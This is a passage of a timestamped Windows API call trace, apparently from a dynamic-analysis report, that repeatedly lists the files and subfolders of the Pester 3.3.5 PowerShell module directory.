ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0226.781] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0226.781] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0226.781] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0226.782] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0226.782] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0226.782] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0226.782] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0226.782] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.782] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe2d0) returned 1 [0226.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe290) returned 1 [0226.783] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe380) returned 1 [0226.783] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x1b7fde70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0226.783] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", nBufferLength=0x105, lpBuffer=0x1b7fde10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", lpFilePart=0x0) returned 0x38 [0226.783] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*", lpFindFileData=0x1b7fe020 | out: lpFindFileData=0x1b7fe020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.783] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.783] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0226.784] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0226.784] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0226.784] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.784] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0226.784] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0226.784] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0226.785] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0226.785] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0226.785] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0226.785] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0226.785] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0226.785] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0226.786] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0226.786] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 0 [0226.786] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe2d0) returned 1 [0226.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe290) returned 1 [0226.786] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x1b7fdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0226.786] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x1b7fdf70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0226.786] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe3b0) returned 1 [0226.786] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe490 | out: lpFileInformation=0x1b7fe490*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0226.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe370) returned 1 [0226.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe3e0) returned 1 [0226.787] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x1b7fded0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0226.787] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", nBufferLength=0x105, lpBuffer=0x1b7fde70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\", lpFilePart=0x0) returned 0x38 [0226.787] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*", lpFindFileData=0x1b7fe080 | out: lpFindFileData=0x1b7fe080*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.787] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.787] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0226.788] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0226.788] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0226.788] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.788] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0226.788] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0226.788] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0226.788] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0226.789] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0226.789] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0226.789] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0226.789] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0226.789] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, 